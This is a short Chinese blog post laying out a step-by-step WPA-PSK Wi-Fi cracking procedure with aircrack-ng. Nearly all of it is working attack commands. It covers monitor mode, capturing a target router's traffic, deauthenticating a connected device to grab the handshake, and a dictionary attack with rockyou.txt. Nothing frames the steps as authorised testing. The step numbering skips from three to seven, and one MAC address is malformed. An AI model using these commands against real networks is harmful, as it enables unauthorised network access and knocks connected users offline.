WPA PSK 無線攻擊流程

第一步:進入Monitor 模式

airmon-ng   #查看當前使用無線網卡

airmon-ng check #查看可能影響無線掃描的進程

airmon-ng check kill #關閉有可能影響無線掃描的進程

airmon-ng start wlan0 #使用wlan0 進入Monitor模式

使用 iwconfig 命令 查看 wlanmon的 Mode項是否切換爲Monitor模式

第二步:啓動抓包並保存數據包

airodump-ng wlan0mon -c 1 --bssid 00:11:22:33:44:55 -w wpa #--bssid 監聽指定MAC的設備 -c 是指定信道 -w 把監聽的數據包寫入文件

第三步:Deauthentication 抓取XOR文件(有無線設備已經連接上路由器)

發送解除數據包打斷現在與AP(路由器)連接的設備(手機,筆記本等),讓設備再次重新連接

aireplay-ng -0 1 -a EC:26:CADC:29:B6 -c 68:3E:34:30:0F:AA wlan0mon# -0打斷指令  1 進行一次嘗試 -a 路由器的mac  -c要斷開的無線設備MAC地址 wlan0mon 使用的無線網卡

出現 handshake說明成功獲取四次握手信息:

第七步:使用密碼字典進行攻擊(可用kali自帶,也可用網上下載或者自己組合生成的字典)

aircrack-ng -w /usr/share/john/password.lst wpa-01.cap   # -w 使用的字典 

/usr/share/wordlist 裏面有一個比較大的字典(一千多萬個密碼):rockyou.txt.gz,可解壓後用

最後得出密碼:

 

 

發佈了38 篇原創文章 · 獲贊 10 · 訪問量 9萬+
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章